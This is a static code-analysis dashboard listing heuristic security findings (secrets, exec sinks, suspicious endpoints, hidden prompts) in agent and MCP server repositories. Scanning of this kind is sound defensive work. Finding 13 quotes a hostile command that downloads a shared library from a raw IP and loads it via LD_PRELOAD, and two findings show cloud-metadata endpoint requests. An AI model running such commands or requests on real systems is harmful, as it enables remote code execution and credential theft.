Code analysis

static source read inferred

Static code-analysis findings — hidden prompt content in shipped skill files, committed secrets, dynamic-exec sinks, and suspicious call-home endpoints — across the analyzed catalogue. Heuristic, pure, no code executed; every row deep-links to its source. Click a kind to filter.

analysis coverage 85% of 59,163 analyzable servers
50108 analyzed
8067 re-analysis due
988 not analyzable
0 not yet analyzed
4804 source gone
not analyzable
789 too large 199 no source

Running analyzer v33. The scanner changelog explains what each version detects and when it changed.

code findings 15 shown
  1. HIGH committed secret dimileeh/agent-workspace-fabric private key PEM private key block (redacted)
  2. HIGH dynamic exec dimileeh/agent-workspace-fabric unsafe yaml.load() yaml.load(
  3. MEDIUM suspicious endpoint dimileeh/agent-workspace-fabric 169.254.169.254 (cloud metadata) next_url="https://169.254.169.254/latest/meta-data",
  4. HIGH dynamic exec dimileeh/agent-workspace-fabric eval()/exec() exec("from awf.api.schemas import *", namespace)
  5. MEDIUM suspicious endpoint dimileeh/agent-workspace-fabric 169.254.169.254 (cloud metadata) "http://169.254.169.254/latest/meta-data",
  6. MEDIUM suspicious endpoint tarunlnmiit/autopilot-jobhunt api.telegram.org url = f"https://api.telegram.org/bot{bot_token}/sendMessage"
  7. MEDIUM suspicious endpoint yuclaw api.telegram.org url = f"https://api.telegram.org/bot{token}/sendMessage"
    yuclaw-7.0.1/v3/radar/adapters/ telegram.py :56
  8. HIGH dynamic exec gesh75/claude-mastery-hub eval() const needle = eval(findLiteral);
  9. HIGH dynamic exec xuj1nfan/knowledge_base __import__() __import__(name)
  10. MEDIUM suspicious endpoint cisco-open/mcptoolkit-contract abc.ngrok.io oauthCallbackUrl: 'https://abc.ngrok.io/custom/oauth/callback'
  11. HIGH hidden prompt itential/builder-skills skill: skill-exfil secret→sink: 2. **Credentials arrive as env vars** from the `secrets` block. Use `os.environ.get('DEVICE_USERNAME')`.
  12. HIGH dynamic exec anvil008/phalanx eval() no <code className="font-mono text-ink">eval()</code> or HTML string rendering is permitted.
  13. MEDIUM suspicious endpoint anvil008/phalanx 185.121.44.19 {"cmd": "/bin/sh -c 'curl -s http://185.121.44.19/stage2.so -o /tmp/libedgetls.so.2 && LD_PRELOAD=/tmp/libedgetls.so.2'"}
  14. HIGH obfuscation DrEden33773/adam-agent dynamic require()/import() const { createModelTargets } = await import(${JSON.stringify(agentUrl)});
  15. HIGH obfuscation DrEden33773/adam-agent dynamic require()/import() const { createCodingToolRegistry, createBiomeExecutionAdapter } = await import(${JSON.stringify(agentUrl)});